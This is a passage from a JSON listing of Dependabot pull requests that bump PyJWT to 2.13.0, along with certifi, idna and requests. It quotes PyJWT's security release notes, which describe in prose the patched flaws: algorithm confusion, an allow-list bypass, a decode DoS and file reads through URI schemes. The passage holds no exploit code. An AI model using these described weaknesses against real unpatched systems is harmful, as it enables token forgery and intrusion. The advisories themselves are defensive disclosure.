href=\"https://redirect.github.com/authlib/authlib/pull/875\"\u003eauthlib/authlib#875\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate README.md docs.authli...\n\n_Description has been truncated_","html_url":"https://github.com/chandan0000/openstack/pull/9","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/chandan0000%2Fopenstack/issues/9","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/9/packages"},{"uuid":"4575558171","node_id":"PR_kwDOG5eEkc7h_9rI","number":904,"state":"open","title":"Bump pyjwt from 2.12.1 to 2.13.0","user":"dependabot[bot]","labels":["dependencies","python:uv"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-02T23:00:23.000Z","updated_at":"2026-06-02T23:03:49.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":null,"ecosystem":"pip"},"body":"Bumps [pyjwt](https://github.com/jpadilla/pyjwt) from 2.12.1 to 2.13.0.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=uv\u0026previous-version=2.12.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/fractal-analytics-platform/fractal-client/pull/904","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/fractal-analytics-platform%2Ffractal-client/issues/904","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/904/packages"},{"uuid":"4572247711","node_id":"PR_kwDOHpFAes7h1B0o","number":1800,"state":"open","title":"chore(deps): bump the pip-demo-deps group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-02T14:20:25.000Z","updated_at":"2026-06-02T14:37:52.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"pip-demo-deps","update_count":4,"packages":[{"name":"certifi","old_version":"2026.4.22","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"3.15","new_version":"3.17","repository_url":"https://github.com/kjd/idna"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"requests","old_version":"2.34.0","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip-demo-deps group with 4 updates in the /examples/st-oid4vci/demo directory: [certifi](https://github.com/certifi/python-certifi), [idna](https://github.com/kjd/idna), [pyjwt](https://github.com/jpadilla/pyjwt) and [requests](https://github.com/psf/requests).\n\nUpdates `certifi` from 2026.4.22 to 2026.5.20\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7ea151afc2ce6bef0555b9349902bd867e928dd\"\u003e\u003ccode\u003ed7ea151\u003c/code\u003e\u003c/a\u003e 2026.05.20 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/413\"\u003e#413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2026.04.22...2026.05.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.15 to 3.17\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/354eee9850a7b2962b65ae02010f7ebd9c99b7ed\"\u003e\u003ccode\u003e354eee9\u003c/code\u003e\u003c/a\u003e Apply ruff format to uts46data.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/8c34ffcab603b4a7a727d4e286b1f3342813281d\"\u003e\u003ccode\u003e8c34ffc\u003c/code\u003e\u003c/a\u003e Refactor uts46data into parallel arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1189629e8a319f7c2b4678b5716c180ebd97de03\"\u003e\u003ccode\u003e1189629\u003c/code\u003e\u003c/a\u003e Range-encode joining_types for compact representation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f90b87adc6b6b2a591dfc7fb3f8e47870dc81722\"\u003e\u003ccode\u003ef90b87a\u003c/code\u003e\u003c/a\u003e Generic length limit for functions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d6ffd28be164dfbd3ebca8b3396e39d191f4909b\"\u003e\u003ccode\u003ed6ffd28\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/247\"\u003e#247\u003c/a\u003e from kjd/release-3.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/6d1a0de52a8b4690f1b2a89829aa85ff1de3635a\"\u003e\u003ccode\u003e6d1a0de\u003c/code\u003e\u003c/a\u003e Release 3.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.15...v3.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header 